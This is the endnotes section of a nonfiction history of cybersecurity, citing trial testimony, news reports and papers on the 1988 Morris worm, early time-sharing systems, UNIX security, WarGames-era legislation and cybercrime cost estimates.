“must be wrong”: Testimony of Paul Graham, USA v. Robert Tappan Morris transcript, 986.
11:00 p.m., November 2: All times are EST.
Ithaca, New York: Testimony of Dawson Dean, Morris transcript, 574. The current home is Bill & Melinda Gates Hall.
a computer “worm”: Donn Seeley has the time down as 6:00 p.m. PST, which is 9:00 p.m. EST. He notes, “11/21: 1800 (approx.): This date and time were seen on worm files found on prep.ai.mit.edu … The files were removed later, and the precise time was lost. System logging on prep had been broken for two weeks. The system doesn’t run accounting and the disks aren’t backed up to tape: a perfect target.” Donn Seeley, “A Tour of the Worm,” 1988, http://www.cs.unc.edu/~jeffay/courses/nidsS05/attacks/seely-RTMworm-89.html. At trial, Robert Morris Jr. testified, “I released it, I think, at about eight o’clock that night.” Morris transcript, 1097. Dawson Dean reported seeing Robert at a Sun terminal “in late evening so it would be around 8 o’clock.” Morris transcript, 874.
University of Pittsburgh: Eugene Spafford, “The Internet Worm Program: An Analysis,” Purdue Technical Report CSD-TR-823, November 29, 1988, 2, https://spaf.cerias.purdue.edu/tech-reps/823.pdf.
Whack-a-Worm: For chronology, see Seeley, “A Tour of the Worm,” 2.
“machines were crashing”: Testimony of Dean Krafft, Morris transcript, 132.
disconnect the department computers: Krafft, Morris transcript, 134.
Bell Labs: John Markoff, “How a Need for Challenge Seduced Computer Expert,” The New York Times, November 6, 1988.
“under attack”: Email, The “Security Digest” Archives, https://web.archive.org/web/20041124203457/securitydigest.org/
tcp-ip/archive/1988/11.
hostile foreign power: See, e.g., Testimony of Michael Muuss, Morris transcript, 873.
“‘This is the catastrophe’”: Lawrence M. Fisher, “On the Front Lines in Battling Electronic Invader,” The New York Times, November 5, 1988.
shy and awkward young man: See, e.g., John Markoff, “Author of Computer ‘Virus’ Is Son of N.S.A. Expert on Data Security,” The New York Times, November 5, 1988.
installed a remote terminal: Katie Hafner and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier (New York: Simon and Schuster, 1991), 265.
sold by Radio Shack: Lily Rothman, “The Personal Computer That Beat Apple (for a While),” Time, August 3, 2015, time.com/3968790/tandy-trs-80-history.
TRS-80 retailed: See, e.g., advertisement in Byte, June 1977, 15, https://archive.org/details/byte-magazine-1977-06/page/n15/mode/2up?view=theater.
cassette tapes: On the use of audio cassettes for storage, see Stan Viet, Stan Viet’s History of the Personal Computer (Asheville, NC: Worldcomm, 1993), 80.
to our safety?: See, e.g., Riley de León, “50% of U.S. Tech Execs Say State-Sponsored Cyber Warfare Their Biggest Threat: CNBC Survey,” CNBC, December 17, 2020, https://www.cnbc.com/2020/12/17/50percent-of-tech-execs-say-cyber-warfare-biggest-threat-cnbc-survey.html.
developed until 1992: Thom Holwerda, “The World’s First Graphical Browser: Erwise,” OS News, March 3, 2009, https://www.osnews.com/story/21076/the-worlds-first-graphical-browser-erwise/.
half of all property crimes: Maria Tcherni, Andrew Davies, Giza Lopes, and Alan Lizotte, “The Dark Figure of Online Property Crime: Is Cyberspace Hiding a Crime Wave?,” Justice Quarterly 33, no. 5 (2016): 890–911; Ross Anderson et al., “Measuring the Changing Cost of Cybercrime.” The 18th Annual Workshop on the Economics of Information Security, 2019, https://www.repository.cam.ac.uk/handle/1810/294492.
$600 billion to $6 trillion: Compare James Lewis, “Economic Impact of Cybercrime—No Slowing Down,” February 2018, 6 (“$445 billion to $600 billion”), https://csis-website-prod.s3.amazonaws.com/s3fs-public/publication/economic-impact-cybercrime.pdf, to Steve Morgan, “Global Cybercrime Damages Predicted to Reach $6 Trillion Annually by 2021,” Cybercrime Magazine, October 26, 2020, https://cybersecurityventures.com/annual-cybercrime-report-2020/. These are global estimates. See also Paul Dreyer et al., “Estimating the Global Cost of Cyber Risk,” RAND Corporation, January 14, 2018, https://www.rand.org/pubs/research_reports/RR2299.html (“the global cost of cyber crime has direct gross domestic product [GDP] costs of $275 billion to $6.6 trillion and total GDP costs [direct plus systemic] of $799 billion to $22.5 trillion [1.1 to 32.4 percent of GDP].”). Note that actual reports in the United States differ from these estimates by at least two orders of magnitude. “In 2021, IC3 [FBI Internet Crime Complaint Center] continued to receive a record number of complaints from the American public: 847,376 reported complaints, which was a 7% increase from 2020, with potential losses exceeding $6.9 billion.” Internet Crime Complaint Center, Federal Bureau of Investigation Internet Crime Report 2021, 3, https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf.
“greatest threat”: Steve Morgan, “IBM’s CEO on Hackers: ‘Cyber Crime Is the Greatest Threat to Every Company in the World,’” Forbes, November 24, 2015, https://www.forbes.com/sites/stevemorgan/2015/11/24/ibms-ceo-on-hackers-cyber-crime-is-the-greatest-threat-to-every-company-in-the-world/?sh=2776a87973f0.
ransomware attack on my publisher’s: Carly Page, “US Publisher Macmillan Confirms Cyberattack Forced Systems Offline,” TechCrunch, July 1, 2022, https://techcrunch.com/2022/07/01/publisher-macmillan-ransomware.
SolarWinds: Ellen Nakashima and Craig Timberg, “Russian Government Spies Are Behind a Broad Hacking Campaign That Has Breached US Agencies and a Top Cyber Firm,” The Washington Post, December 13, 2020.
Even Microsoft was compromised: Thomas Brewster, “DHS, DOJ and DOD Are All Customers of SolarWinds Orion, the Source of the Huge Government Hack,” Forbes, December 14, 2020, https://www.forbes.com/sites/thomasbrewster/2020/12/14/dhs-doj-and-dod-are-all-customers-of-solarwinds-orion-the-source-of-the-huge-us-government-hack/?sh=20fce79d25e6.
“the largest and most sophisticated attack”: Brad Heath, “SolarWinds Hack Was ‘Largest and Most Sophisticated Attack’ Ever—Microsoft President,” Reuters, February 15, 2021, https://news.yahoo.com/solarwinds-hack-largest-most-sophisticated-020634680–100447916.html.
15 billion: The 15 billion figure includes only Internet of Things devices. See Lionel Sujay Vailshery, “Number of IoT Connected Devices Worldwide 2019–2021, with Forecasts to 2030,” Statista, August 22, 2022, https://www.statista.com/statistics/1183457/iot-connected-devices-worldwide.
Security—whether it be: On the uses of “security” in debates over internet governance, see Josephine Wolff, “What We Talk About When We Talk About Cybersecurity: Security in Internet Governance Debates,” Internet Policy Review 5, no. 3 (2016).
and stronger encryption: As I have since learned, properly implemented, well-studied cryptography is pretty much never broken. Hacking is less about breaking encryption than breaking something around the encryption in order to sidestep it.
50 million lines of code: “Windows 10 Lines of Code,” Microsoft, 2020, https://answers.microsoft.com/en-us/windows/forum/all/windows-10-lines-of-code/a8f77f5c-0661–4895–9c77–2efd42429409.
Turing Test: Turing set out his test for intelligence in Alan Turing, “Computing Machinery and Intelligence,” Mind 59, no. 236 (October 1950): 433–60. A Turing Test has a human judge and a computer subject attempting to appear human. A “reverse” Turing Test has a computer judge and a human subject trying to appear human. CAPTCHA—the irritating image-recognition challenge that websites use for detecting bots—stands for “Completely Automated Public Turing test to tell Computers and Humans Apart.”
principles of metacode: Alan Turing, “On Computable Numbers with an Application to the Entscheidungproblem,” Proceedings of the London Mathematical Society, 1936, 230–65.
solvable problem: Computers cannot solve every problem, because, as Turing showed, and as I will explain in the Epilogue, most problems are not solvable by computers, humans, or any computational device that uses finite procedures.
Cybercrime is a business: Cyberespionage, and in particular nation-state cyberespionage, differs from cybercrime in that attackers have near-infinite resources to spend targeting their adversaries. On cyberespionage, see chapter 8.
spy on you making dinner: Sadly, it does happen. See, e.g., Nate Anderson, “Meet the Men Who Spy on Women Through Their Webcams,” Ars Technica, February 10, 2013, https://arstechnica.com/tech-policy/2013/03/rat-breeders-meet-the-men-who-spy-on-women-through-their-webcams/.
“hack your heart”: See “Hackers Can Access Your Pacemakers, but Don’t Panic Just Yet,” Healthline, April 4, 2019, https://www.healthline.com/health-news/are-pacemakers-defibrillators-vulnerable-to-hackers.
CNN reported on: Matt McFarland, “Teen’s Tesla Hack Shows How Vulnerable Third-Party Apps May Make Cars,” CNN Business, February 2, 2022, https://www.cnn.com/2022/02/02/cars/tesla-teen-hack/index.html.
Cyber 9/11: See, e.g., John Arquilla and David Ronfeldt, “Cyberwar Is Coming!,” Comparative Strategy 12, no. 2 (Spring 1993): 141–65. Richard Clarke coined the term Digital Pearl Harbor: see “Seven Questions: Richard Clarke on the Next Cyber Pearl Harbor,” Foreign Policy, April 2, 2008, foreignpolicy.com/2008/04/02/seven-questions-richard-clarke-on-the-next-cyber-pearl-harbor/; Lisa Vaas, “Is Digital Pearl Harbor THE Most Tasteless Term in IT Security?,” Naked Security by Sophos (blog), February 9, 2012, https://nakedsecurity.sophos.com/2012/02/09/digital-pearl-harbor/.
the “perfect weapon”: David E. Sanger, The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age (New York: Crown, 2018).
the truth is less dramatic: To be clear, David Sanger’s book is excellent, and I highly recommend it, for both the reporting and the writing.
malware that functions: Sophisticated malware may be “cross-platformed,” meaning it can be used by more than one operating system. For example, according to CrowdStrike, the Russian malware known as X-Agent, which we will encounter in chapter 8, “is a cross platform remote access toolkit, variants have been identified for various Windows operating systems, Apple’s iOS, and likely the MacOS.” Adam Meyers, “Danger Close: Fancy Bear Tracking of Ukrainian Field Artillery Units,” CrowdStrike (blog), December 22, 2016. Though these are rare, there have been vulnerabilities that are serious because they are part of pervasive protocols and services. See, e.g., Heartbleed bug (2014), http://www.heartbleed.com, and Log4J vulnerability (2021), https://nvd.nist.gov/vuln/detail/CVE-2021-44228.
beleaguered networks: See, e.g., Nominet Cyber Security, Life Inside the Perimeter: Understanding the Modern CISO, 2019, https://media.nominet.uk/wp-content/uploads/2019/02/12130924/Nominet-Cyber_CISO-report_FINAL-130219.pdf. Seventeen percent said that they had turned to medication or alcohol to help deal with stress.
learned helplessness: Steven F. Maier and Martin E. P. Seligman, “Learned Helplessness at Fifty: Insights from Neuroscience,” Psychological Review 123, no. 4 (2016): 349–67, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4920136/.
five hacks: Some hacks have been extensively discussed by others, so I did not tell those stories again; e.g., STUXNET, in Kim Zetter, Countdown to Zero Day: STUXNET and the Launch of the World’s First Digital Weapon (New York: Crown, 2014); Conficker, in Mark Bowden, Worm: The First Digital World War (New York: Grove Press, 2012); Dark Energy, in Andy Greenberg, Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin’s Most Dangerous Hackers (New York: Doubleday, 2019).
“There is not one”: John Markoff, “‘Virus’ in Military Computers Disrupts Systems Nationwide,” The New York Times, November 4, 1988.
Andy sent out: Email, The “Security Digest” Archives, https://web.archive.org/web/20041124203457/securitydigest.org/
tcp-ip/archive/1988/11.
for forty-eight hours: David Stipp, “First Computer Message on Stopping Virus Took 48 Hours to Reach Target,” The Wall Street Journal, November 8, 1988. On the path taken by Sudduth’s email, see Jon A. Rochlis and Mark W. Eichin, “With Microscope and Tweezers: The Worm from MIT’s Perspective,” Communications of the ACM 32, no. 6 (1989): 690–91.
“Can I talk to Dad?”: Katie Hafner and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontiers (New York: Simon and Schuster, 1991), 311.
Atlantic City … unironically: Papers were presented at the Spring Joint Computer Conference in Atlantic City, April 18–20, 1967, sponsored by the New Jersey branch of the American Federation of Information Processing Societies. Papers included Bernard Peters, “Security Considerations in a Multi-programmed Computers System,” Spring Joint Computer Conference, 1967, http://www.ukcert.org.uk/SecurityConsiderationsInMulti-ProgrammedComputerSystem_p283-Peters.pdf; Willis H. Ware, “Security and Privacy in Computer Systems”; and H. E. Peterson and R. Turn, “System Implications of Information Privacy.” ARPA also commissioned a report on computer security in 1967, eventually published in 1970 as “Security Controls for Computer Systems: Report of Defense Science Board Task Force on Computer Security,” https://csrc.nist.gov/csrc/media/publications/conference-paper/1998/10/08/proceedings-of-the-21st-nissc-1998/documents/early-cs-papers/ware70.pdf.
soccer field: Tom van Vleck, “My Experience with the IBM 7094 and CTSS,” 1995, https://www.multicians.org/thvv/tvv7094.html.
“mainframe” computers: Paul E. Ceruzzi, A History of Modern Computing, 2nd ed. (Cambridge, MA: MIT Press, 2002), 71.
cost $3 million: “A typical 7094 sold for $3,134,500.” IBM Archives FAQ at https://www.ibm.com/ibm/history/reference/faq_0000000011.html.
IBM’s president: David Walden and Tom van Vleck, eds., “Compatible Time-Sharing System (1961–1973): Fiftieth Anniversary Commemorative Overview,” IEEE Computer Society, June 2011, 6. IBM offered a 40 percent discount to universities for their smaller Model 650 provided that they offered a business data processing or computer science course, 60 percent for those offering both. Thomas J. Watson Jr., Father, Son & Co. (New York: Bantam Books, 1990), 244.
the previous user was gone: User data still existed on peripheral storage, so it was possible for another job to access it. But this would have to be done in front of a computer operator, making detection easier.
“Corby” Corbató: Fernando Corbató, “On Building Systems That Will Fail,” Communications of the ACM, September 1991, https://dl.acm.org/doi/abs/10.1145/114669.114686.
Compatible Time-Sharing System: See Fernando Corbató et al., The Compatible Time-Sharing System: A Programmers Guide, MIT Computer Center, 1963, http://www.bitsavers.org/pdf/mit/ctss/CTSS_ProgrammersGuide.pdf. CTSS was “compatible” because it could still be used for batch processing.
“time-sharing”: On the provenance of time-sharing, and the different meanings attached to the term, see John McCarthy, “Reminiscence on the Theory of Time-Sharing,” Winter or Spring 1983, http://jmc.stanford.edu/computing-science/timesharing.html. “Shortly after the first paper on time-shared computers by C. Strachey at the June 1959 UNESCO Information Processing conference, H.M. Teager and J. McCarthy delivered an unpublished paper ‘Time-Shared Program Testing’ at the August 1959 ACM Meeting.” Corbató et al., The Compatible Time-Sharing System.
IBM 7094: Donald MacKenzie and Garrel Pottinger, “Mathematics, Technology, and Trust: Formal Verification, Computer Security, and the U.S. Military,” IEEE Annals of the History of Computing 19, no. 3 (1997): 42.
Hell, as Jean-Paul Sartre: Jean-Paul Sartre, Huis Clos (1944) (“l’enfer c’est les autres”).
illusion of single use: Though the first version of CTSS could run several jobs simultaneously, it could hold only one program in core memory at a time. It would have to swap out memory to disk for each toggle between jobs. Later iterations loaded multiple jobs into memory at the same time.
less precious computer memory: Robert McMillan, “The World’s First Computer Password? It Was Useless Too,” Wired, January 27, 2012, https://www.wired.com/2012/01/computer-password.
UACCNT.SECRET: Walden and van Vleck, “Compatible Time-Sharing System (1961–1973),” 36–37.
six years of development: Two years earlier, IBM introduced a time-sharing system for its 360 series. Emerson Pugh, Lyle Johnson, and John Palmer, IBM’s 360 and Early 370 Systems (Cambridge, MA: MIT Press, 1991), 362–63.
switching to time-sharing: P. A. Karger and R. R. Schell, “Thirty Years Late: Lessons from the Multics Security Evaluation,” Eighteenth Annual Computer Security Applications Conference, 2002, https://www.acsac.org/2002/papers/classic-multics.pdf.
the evaluation concluded: Paul Karger and Roger Schell, “Multics Security Evaluation: Vulnerability Analysis,” June 1974, https://www.acsac.org/2002/papers/classic-multics-orig.pdf.
IBM mainframe: See, e.g., Digital Equipment Corporation, Ninteen Fifty-Seven to the Present, 1978, http://gordonbell.azurewebsites.net/digital/dec%201957%20to%20present%201978.pdf.
to form “scripts”: Doug McIlroy, E. N. Pinson, and B. A. Tague, “Unix Time-Sharing System: Foreword,” Bell System Technical Journal, July 8, 1978, 1902–3.
changed to UNIX: Brian Kernighan is reputed to have changed the name to UNIX, though he cannot remember whether he did. Peter Salus, A Quarter Century of UNIX (Boston: Addison-Wesley, 1994), 9.
UNIX was a massive success: The system was already well developed before v1 appeared in 1971. And not until v4 was the system first described in public. See, e.g., Douglas McIlroy, A Research UNIX Reader: Annotated Excerpts from the Programmer’s Manual, 1971–1986, https://www.cs.dartmouth.edu/~doug/reader.pdf.
direct descendant: See chart at upload.wikimedia.org/wikipedia/commons/7/77/Unix_history-simple.svg.
“The first fact to face”: Dennis Ritchie, “On the Security of UNIX,” UNIX Programmer’s Manual, Volume 2 (Murray Hill, NJ: Bell Telephone Laboratories, 1979), 592.
UNIX gave users greater privileges: Matt Bishop wrote a UNIX security report in 1981 listing twenty-one vulnerabilities falling into six categories. See Matt Bishop, “Reflections on UNIX Vulnerabilities,” Annual Computer Security Applications Conference, 2009.
Louis Harris & Associates: Survey by Southern New England Telephone, September 1–11, 1983, national adult sample of 1,256. Data provided by the Roper Center for Public Opinion Research, University of Connecticut, cited in Susannah Fox and Lee Rainie, “The Web at 25, Part 1: How the Internet Has Woven Itself into American Life,” Pew Research Center, February 27, 2014, https://www.pewresearch.org/internet/2014/02/27/part-1-how-the-internet-has-woven-itself-into-american-life/#fn-10743–2.
The movie WarGames: Fred Kaplan, “‘WarGames’ and Cybersecurity’s Debt to a Hollywood Hack,” The New York Times, February 20, 2016.
WarGames: Scott Brown, “WarGames: A Look Back at the Film That Turned Geeks and Phreaks into Stars,” Wired, July 21, 2008, https://www.wired.com/2008/07/ff-wargames/?currentPage=all.
“Man is in the loop”: Rick Inderfurth, “WarGames,” ABC Evening News, July 8, 1983.
“relax and enjoy the film”: John Chancellor, “WarGames,” NBC Nightly News, July 13, 1983.
look into it: Kaplan, “‘WarGames’ and Cybersecurity’s Debt.”
NSDD-145: National Security Decision Directive Number 145, National Policy on Telecommunications and Automated Information Systems Security, September 17, 1984, https://irp.fas.org/offdocs/nsdd145.htm.
address “cybercrime”: The federal government itself was the largest consumer of computer products and services and wanted legislation to protect government computers. Glenn J. McLoughlin, “Computer Security Issues: The Computer Security Act of 1987,” CRS Issue Brief IB87164, 1988, 1.
“We’re gonna show about four minutes”: Hearings Before the Subcommittee on Transportation, Aviation and Materials of the Committee on Science and Technology, U.S. House of Representatives, Ninety-Eighth Congress, Monday, September 26, 1983, 1. For insightful discussion, see Stephanie R. Schulte, “‘The WarGames Scenario’: Regulating Teenagers and Teenaged Technology (1980–1984),” Television & New Media 9, 487 (2008).
Counterfeit Access Device and Computer Fraud and Abuse Act: P.L. 98–473, 98 Stat. 2190, later codified at 18 USC §1030. This statute limited the criminal offense to three specific scenarios—unauthorized access to obtain national security secrets, personal financial records from financial institutions or credit agencies, and hacking into government computers.
devoted his lecture to cybersecurity: Kenneth Thompson, “Reflections on Trusting Trust,” Communications of the ACM, August 1984, https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_
ReflectionsonTrustingTrust.pdf. The Turing lecture series was inaugurated in 1967.
air force testers: Karger and Schell provided the first public description of the problem that compilers can insert malicious code into themselves. Karger and Schell noted in their examination of Multics vulnerabilities that a “penetrator could insert a trap door into the … compiler … [and] since the PL/I compiler is itself written in PL/I, the trap door can maintain itself, even when the compiler is recompiled.” Karger, “Multics Security Evaluation,” 52.
do the same to UNIX: David Wheeler proposed a countermeasure against the Thompson attack using two different compilers, in David Wheeler, Fully Countering Trusting Trust Through Diverse Double-Compiling (PhD diss., George Mason University, 2009), https://dwheeler.com/trusting-trust/dissertation/html/wheeler-trusting-trust-ddc.html.
“only program you can truly trust”: Thompson, “Reflections on Trusting Trust.”
appearing on: Patrick was also a witness at the congressional cybersecurity hearings. When asked by a member of the subcommittee whether WarGames was an inspiration, Patrick disappointed: “That didn’t instigate us at all.” Many hackers, however, have since claimed that the movie was indeed their first inspiration. See Douglas Thomas, Hacker Culture (Minneapolis: University of Minnesota Press, 2002), 26.
his friends were just novices: The 414 Club mainly exploited default passwords they learned from instruction manuals. Alex Orlando, “The Story of the 414s: The Milwaukee Teenagers Who Became Hacking Pioneers,” Discover, October 10, 2020, https://www.discovermagazine.com/technology/the-story-of-the-414s-the-milwaukee-teenagers-who-became-hacking-pioneers.
$250,000 fine: On the subsequent crackdown by law enforcement, see Bruce Sterling, The Hacker Crackdown: Law and Disorder on the Electronic Frontier (New York: Bantam Books, 1992).
Robert Morris Sr.: “Bob (Robert) Morris stepped in wherever mathematics was involved, whether it was numerical analysis or number theory. Bob invented the distinctively original utilities typo, and dc-HE (with Lorinda Cherry), wrote most of the math library, and wrote primes and factor (with Thompson). His series of crypt programs fostered the Center’s continuing interest in cryptography.” M. Douglas McIlroy, “A Research UNIX Reader: Annotated Excerpts from the Programmer’s Manual, 1971–1986,” https://www.cs.dartmouth.edu/~doug/reader.pdf.
long, graying beard: John Markoff, “Robert Morris, Pioneer in Computer Security, Dies at 78,” The New York Times, June 29, 2011.
“For a cryptographer”: Michael Wines, “A Youth’s Passion for Computers, Gone Sour,” The New York Times, November 11, 1988.
“not a career plus”: Wines, “A Youth’s Passion for Computers, Gone Sour.”
“The case, with all its bizarre twists”: John Markoff, “How a Need for Challenge Seduced Computer Expert,” The New York Times, November 6, 1988.
Through Finger, a now-defunct: It was Cliff Stoll’s idea to run the Finger request. He told Markoff the results over the phone. Kafner and Markoff, Cyberpunks, 261
“I had a feeling”: Markoff, “Author of Computer ‘Virus’ Is Son of N.S.A. Expert on Data Security,” The New York Times, November 5, 1988.
at the state level: In United States v. Seidlitz, 589 F.2d 152 (4th Cir., 1978), Seidlitz was a former employee who used a coworker’s username and password to access his old employer’s network and download valuable software to start a competitor business. Though Seidlitz was prosecuted under the federal wire fraud statute—the CFAA didn’t exist then—he was prosecuted for hacking. As Orin Kerr pointed out to me, Seidlitz should be considered the first computer crime prosecution.
“Robert may have been”: Hafner and Markoff, Cyberpunk, 318–19.
binary strings represent specific instructions: More technically, it means move 2 into the lower 8-bit accumulator (mov 2, AL), then add 2 to the lower accumulator (add 2, AL) and store the sum there.
compilation process: Because the source code was reverse engineered and decompiled, there are different versions of the Morris Worm source code. I used the source code at https://github.com/arialdomartini/morris-worm.
bootstrap code to other nodes: The worm had a preference for internet gateways: once it got a toehold on a gateway, it could jump onto the internet to infect other networks.
written by Bob Morris: See, e.g., David Feldmeier and Philip Karn, “Unix Password Security—Ten Years Later,” Advances in Cryptology—CRYPTO ’89 Proceedings, 1989, https://link.springer.com/chapter/10.1007/0–387–34805–0_6.
the password file: At the time, UNIX stored obfuscated passwords in /etc/passwd. In modern UNIX-like systems, however, /etc/passwd contains user information, while the obfuscated passwords are stored in /etc/shadow with read/write privileges only to the root user.
four hundred commonly used passwords: A full list of passwords can be found in the cracksome.c source code, lines 270–375, https://github.com/arialdomartini/morris-worm/blob/master/cracksome.c.
nine times faster: Source code for the worm’s version of crypt, called wormdes.c, https://github.com/arialdomartini/morris-worm/blob/master/wormdes.c. “While the standard crypt() takes 54 seconds to encrypt 271 passwords on our 8600 (the number of passwords actually contained in our password file), the worm’s crypt() takes less than 6 seconds.” Donn Seeley, “A Tour of the Worm,” http://www.cs.unc.edu/~jeffay/courses/nidsS05/attacks/seely-RTMworm-89.html.
“You idiot”: Graham testimony Morris transcript, 991. Cf. Hafner and Markoff, Cyberpunk, 302 (“You jerk”). The worm code contained additional bugs that failed to limit reinfection. See, e.g., “Tour of the Worm,” Section 4.3, “Population Growth.”
“the Internet”: Markoff, “Author of Computer ‘Virus’ Is Son of N.S.A. Expert on Data Security”; “Spreading a Virus,” The Wall Street Journal, November 7, 1988; Joel Dresang and Mike Kennedy, “‘Business as Usual’ After Virus,” USA Today, November 8, 1988; Philip J. Hilts, “Virus Hits Vast Computer Network; Thousands of Terminals Shut Down to Halt Malicious Program,” The Washington Post, November 4, 1988.
(SATNET): Vinton G. Cerf and Robert E. Kahn, “A Protocol for Packet Network Intercommunication,” IEEE Transactions on Communications 22, 5 (May 1974). For a comprehensive description of TCP/IP, see W. Richard Stevens, Kevin R. Fall, and Gary R. Wright, TCP/IP Illustrated, vol. 1: The Protocols (Boston: Addison-Wesley Longman, 1994). On the history of the internet and the development of TCP/IP, see Janet Abbate, Inventing the Internet (Cambridge, MA: MIT Press, 2000), and Katie Hafner and Matthew Lyon, Where the Wizards Stay Up Late: The Origin of the Internet (New York: Simon and Schuster, 1996).
The internet works: The description that follows is highly simplified. A more accurate description would be: My Yale email client makes a MAPI (Messaging Application Programming Interface) over HTTPS connection to Microsoft Office 365 to deposit the mail into the Office 365 email infrastructure. Microsoft’s outbound servers would look up the MX (Mail Exchange) record for Stanford and route the mail through a series of routers until it reaches Stanford’s MX servers and my friend’s email client. Email correspondence with John Coleman, director Security Risk and Engineering, October 1, 2022.
Port 25: In modern configuration, email clients often communicate with the mail submission agents (i.e., your “Outbox”) across port 587. Mail submission agents then communicate with mail transfer agents (your “Sent Mail”) across port 25.
sequence number: In reality, sequence numbers in TCP never start at 1. Robert Morris actually wrote a paper on why doing so would be a bad idea: Robert T. Morris, “A Weakness in the 4.2 BSD Unix TCP/IP Software,” Computing Science Technical Report 117, AT&T Bell Laboratories, February 1985. Sequence number increment based on the amount of data in the TCP packet. The most up-to-date guidance on sequence number starts was published by IETF in 2012 (https://www.rfc-editor.org/rfc/rfc6528), but each operating system has its own quirky way of doing it.
172.3.45.100: There are two widely used forms of IP addressing. Internet Protocol Version 4 (IPv4) is the one used in the text and most common. It is a 32-bit address (meaning a binary string thirty-two digits long) represented by a string of four decimals, ranging from 0 to 255, separated by dots. There are 232, or 4.2 billion, IPv4 addresses. IPv6 is a 128-bit address, represented by a group of eight hexadecimal numbers (base-16, not base-10 numbers: 0–9, A for 10, B for 11…, and F for 15), ranging from 0 to 65,535, separated by colons. There are 2128, or 3.4 × 1038 possible addresses. For example, the IPv4 address for www.yale.edu is 151.101.2.133; its IPv6 address is 2a04:4e42:0:0:0:0:0:645. (Technically, this IP belongs to Fastly, which protects Yale’s servers.)
three separate files: Even if the worm had been sent in one file, its size would have required it to be split over multiple packets.
even if technologically possible: Modern network devices, such as firewalls, have the ability to engage in “deep packet inspection”—to inspect data carried in payloads. Deep packet inspection would not have been practical to implement in internet routers because it would degrade communication speed, especially given the technology available in the 1980s. (Strictly speaking, routers operate at the internet layers, not the application layer, so they would not have access to the payloads in question.)
end-to-end principle: J. H. Saltzer, D. P. Reed, and D. D. Clark, “End-to-End Arguments in System Design,” ACM Transactions on Computer Systems, November 1984, https://web.mit.edu/Saltzer/www/publications/endtoend/
endtoend.pdf.
not internet vulnerabilities: TCP/IP had security flaws. See, e.g., Steven M. Bellovin, “Security Problems in the TCP/IP Protocol Suite,” Computer Communication Review, April 1989, and Steven M. Bellovin, “A Look Back at “Security Problems in the TCP/IP Protocol Suite,” Annual Computer Security Applications Conference, December 2004. One of the major flaws in the protocol was discovered by Robert Morris Jr., who wrote an article on TCP sequence guessing in 1985, while a sophomore in college: Morris, “A Weakness in the 4.2 BSD Unix TCP/IP Software.” But in his worm Morris did not exploit this or any other flaw of TCP/IP. These protocols were simply used to transmit the worm, which exploited security weaknesses in other services.
BSD 4.2: For the development of the Berkeley Software Distribution, see Marshall Kirk McKusick, “Twenty Years of Berkeley Unix from AT&T—Owned to Freely Redistributable,” in Open Sources: Voices from the Open Source Revolution, ed. Chris DiBona et al. (Sebastopol, CA: O’Reilly, 1999), 31. BSD 4.2 was the first major UNIX distribution to have integrated TCP/IP, though it was present in smaller distributions such as BSD 4.1a–4.1c. See McKusick, 37–38.
unaffected by the worm: See, e.g., Michael Wines, “‘Virus’ Intruder Eliminated, Defense Agency Aides Say,” The New York Times, November 5, 1988.
Military computers were protected: The military internet was connected to the public internet only through special bridges that enabled email to pass through. When the Morris worm hit, military administrators disconnected those bridges, thereby containing the damage.
provide logical proofs: MacKenzie and Pottinger, “Mathematics, Technology,” 46.
information security needs: See, e.g., Michael Warner, “Cybersecurity: A Pre-history,” Intelligence and National Security, 2012; Stephen B. Lipner, “The Birth and Death of the Orange Book,” IEEE Annals of the History of Computing, April–June 2015.
pitfalls of this strategy: On the VMM Security Kernel, see Paul A. Karger et al., “A Retrospective on the VAX VMM Security Kernel,” IEEE Transactions on Software Engineering, November 1991, 1147–65.
a secret backdoor: Karger et al., “Retrospective,” 1159.
expense of advertising and supporting the product: Karger et al., “Retrospective,” 1163.
FOSS: For the locus classicus of FOSS, see Richard Stallman, “GNU Manifesto,” March 1985, http://ftp.math.utah.edu/pub/tex/bib/toc/dr-dobbs-1980.html#10(3): March 1985. For an excellent ethnography of the FOSS LINUX/Debian community, see Gabriella Coleman, Coding Freedom: The Ethics and Aesthetics of Hacking (Princeton, NJ: Princeton University Press, 2012).
all bugs are shallow: Linus’s law was formulated by Eric S. Raymond in The Cathedral and the Bazaar (Sebastopol, CA: O’Reilly Media, 1999). Raymond named his law in honor of Linus Torvalds, the first developer of the Linux kernel.
military built its internet: Thomas G. Harris, et al., “Development of the MILNET,” 15th Annual Electronics and Aerospace Systems Conference (1982), 77–80.
imposed strict security requirements: Milnet, however, was not very secure. See Cliff Stoll, “How Secure Are Computers in the U.S.A.? An Analysis of a Series of Attacks on Milnet Computers,” Computers & Security 7, 6 (1988).
not a pejorative: “HACKER noun 1. A person who enjoys learning the details of computer systems and how to stretch their capabilities—as opposed to most users of computers, who prefer to learn only the minimum amount necessary. 2. One who programs enthusiastically or who enjoys programming rather than just theorizing about programming.” E. S. Raymond, The New Hacker’s Dictionary (Cambridge, MA: MIT Press, 1991).
sinister connotations: On the transformation in the meaning of the term, see Helen Nissenbaum, “Hackers and the Contested Ontology of Cyberspace,” New Media & Society 6 (April 2004): 195–217. Some coined the term cracker to refer to the latter, more sinister connotation and distinguish it from the original meaning. See Eric Raymond, “Cracker,” Jargon File, http://www.catb.org/jargon/html/C/cracker.html.
formally verifying software: W. D. Young and J. McHugh, “Coding for a Believable Specification to Implementation Mapping,” IEEE Computer Society Symposium on Security and Privacy, 1987, 140–48.
the future would bring: The Morris Worm prompted the creation of the first CERT (Computer Emergency Response Team), at Carnegie Mellon University. According to Spafford, CERT’s mission was to coordinate the civilian and military parts of the internet. (“The purpose of CERT is to act as a central switchboard and coordinator for computer security emergencies on Arpanet and MILnet computers”: Eugene Spafford, “Crisis and Aftermath,” Communications of the ACM 32, no. 6 [1989], 685.) In response to 9/11, the Department of Homeland Security established its own response team, US-CERT, in 2003. See generally Rebecca Slayton and Brian Clarke, “Trusting Infrastructure: The Emergence of Computer Security Incident, 1989–2005,” Technology and Culture 61 (2020). On the proliferation of CERTs, see Laura DeNardis, The Global War for Internet Governance (Oxford: Oxford University Press, 2014), 90–92: “Although one of the original objectives of the first response team was to centrally coordinate responses to Internet-wide security breaches, what has materialized over time is a mosaic of hundreds of independently operating CERTs across the world,” 92.
